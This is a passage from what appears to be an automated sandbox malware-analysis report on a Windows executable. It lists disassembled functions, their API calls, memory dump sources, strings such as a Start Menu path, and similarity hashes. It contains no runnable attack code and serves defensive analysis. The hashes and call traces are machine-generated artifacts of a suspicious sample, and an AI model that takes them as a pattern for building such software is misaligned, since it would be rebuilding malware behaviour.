                                            • Instruction Fuzzy Hash: 78A17FB1A00209ABDB11EFA5CD81AAF77B8EF84314F10843BF601B62D1D77C99418F69
                                            Function 004021A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00402261
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: CreateInstance
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                            • API String ID: 542301482-2757888794
                                            • Opcode ID: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                            • Instruction ID: 318f5a272383e4943f9a7a1f828131c4cf43be91e798f39f03958dcf779540d2
                                            • Opcode Fuzzy Hash: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                            • Instruction Fuzzy Hash: 67412771A00208AFCF00DFE4C989A9E7BB6FF48304B2045AAF515EB2D1DB799981CB54
                                            Function 00402902 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                            • Instruction ID: c1f6bc4fbd4392edc64dd94dfb26af21a0adc514685abdce03c7c09792edecab
                                            • Opcode Fuzzy Hash: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                            • Instruction Fuzzy Hash: FAF08CB1A00104ABC700DFA4DD499AEB378EF10324F70857BE911F21E0D7B89E109B3A
                                            Function 00404DB1 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490windowmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DC8
                                            • GetDlgItem.USER32(?,00000408), ref: 00404DD5
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E21
                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E38
                                            • SetWindowLongW.USER32(?,000000FC,004053CA), ref: 00404E52
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E66
                                            • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E7A
                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404E8F
                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E9B
                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EAD
                                            • DeleteObject.GDI32(00000110), ref: 00404EB2
                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EDD
                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EE9
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F84
                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FB4
                                              • Part of subcall function 00404379: SendMessageW.USER32(00000028,?,00000001,004041A4), ref: 00404387
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FC8
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FF6
                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405004
                                            • ShowWindow.USER32(?,00000005), ref: 00405014
                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405115
                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405177
                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040518C
                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B0
                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D3
                                            • ImageList_Destroy.COMCTL32(?), ref: 004051E8
                                            • GlobalFree.KERNEL32(?), ref: 004051F8
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405271
                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531A
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405329
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405353
                                            • ShowWindow.USER32(?,00000000), ref: 004053A1
                                            • GetDlgItem.USER32(?,000003FE), ref: 004053AC
                                            • ShowWindow.USER32(00000000), ref: 004053B3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 2564846305-813528018
                                            • Opcode ID: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                            • Instruction ID: 7baa9a5517a4605733e15ddb68db2cf5b5f1e79b3ae63259faab1fa91bacf49a
                                            • Opcode Fuzzy Hash: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                            • Instruction Fuzzy Hash: 24127A70900609EFDB20CF65CC45AAF7BB5FB85314F10817AEA10BA2E1DB798951DF58
                                            Function 00404503 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045A1
                                            • GetDlgItem.USER32(?,000003E8), ref: 004045B5
                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045D2
                                            • GetSysColor.USER32(?), ref: 004045E3
                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045F1
                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045FF
                                            • lstrlenW.KERNEL32(?), ref: 00404604
                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404611
                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404626
                                            • GetDlgItem.USER32(?,0000040A), ref: 0040467F
                                            • SendMessageW.USER32(00000000), ref: 00404686
                                            • GetDlgItem.USER32(?,000003E8), ref: 004046B1
                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046F4
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404702
                                            • SetCursor.USER32(00000000), ref: 00404705
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040471E
                                            • SetCursor.USER32(00000000), ref: 00404721
                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404750
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404762
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                            • String ID: Call$N$zD@
                                            • API String ID: 3103080414-4182535457
                                            • Opcode ID: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                            • Instruction ID: a130e1d57a17a91ade9f3fb54c611fa5fc44c03720afd6b67d12dead6e9fe9b9
                                            • Opcode Fuzzy Hash: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                            • Instruction Fuzzy Hash: 3D6181B1900209BFDB10AF60DD85E6A7BA9FB85354F00803AFB05B72D1C778A951CF99
                                            Function 0040603A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061D5,?,?), ref: 00406075
                                            • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 0040607E
                                              • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                              • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                            • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 0040609B
                                            • wsprintfA.USER32 ref: 004060B9
                                            • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 004060F4
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406103
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040613B
                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406191
                                            • GlobalFree.KERNEL32(00000000), ref: 004061A2
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A9
                                              • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                              • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                            • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                                            • API String ID: 2171350718-2304911260
                                            • Opcode ID: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                            • Instruction ID: 03fe7b931bffc2b02635af9c10f4e714808f3729e90155368a1b4a6ed52067ca
                                            • Opcode Fuzzy Hash: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                            • Instruction Fuzzy Hash: 44312370600B05BFD6206B618D48F6B3A6CDF86744F15013AFD42FA2C3DA3C99218ABD
                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                            Download Yara Rule
                                            APIs
                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                            • Instruction ID: d956376f91ba3d110af617c57d1628f0fb3f6748c3ab60faf4ed9a16e53922cc
                                            • Opcode Fuzzy Hash: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                            • Instruction Fuzzy Hash: 78418B71800209AFCF058FA5CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                                            Function 0040669D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                            • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                            • CharNextW.USER32(?,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                            • CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                            Strings
                                            • "C:\Users\user\Desktop\Ntwph4urc1.exe", xrefs: 0040669D
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040669E
                                            • *?|<>/":, xrefs: 004066EF
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                            • API String ID: 589700163-2297971204
                                            • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                            • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                            • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                            • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                            Function 004043AB Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043C8
                                            • GetSysColor.USER32(00000000), ref: 00404406
                                            • SetTextColor.GDI32(?,00000000), ref: 00404412
                                            • SetBkMode.GDI32(?,?), ref: 0040441E
                                            • GetSysColor.USER32(?), ref: 00404431
                                            • SetBkColor.GDI32(?,?), ref: 00404441
                                            • DeleteObject.GDI32(?), ref: 0040445B
                                            • CreateBrushIndirect.GDI32(?), ref: 00404465
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
